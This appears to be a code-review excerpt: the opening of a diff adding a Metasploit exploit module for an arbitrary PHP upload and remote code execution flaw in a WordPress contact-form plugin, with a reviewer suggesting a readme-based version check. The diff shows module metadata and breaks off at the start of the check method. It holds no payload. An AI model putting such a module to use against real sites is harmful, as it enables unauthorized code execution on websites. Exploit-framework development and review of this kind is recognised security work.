modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb

```diff
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
+        plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'Claudio Viviani', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
+          ['WPVDB', '7896']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['N-Media WebSite Contact Form 1.3.4', {}]],
+      'DisclosureDate' => 'Apr 12 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
```

Comment:
you can replace the whole check code with:
`check_plugin_version_from_readme('website-contact-form-with-file-upload', version)`

The vulnerable version contains a readme.txt with the version number inside: http://plugins.svn.wordpress.org/website-contact-form-with-file-upload/tags/1.3.4/readme.txt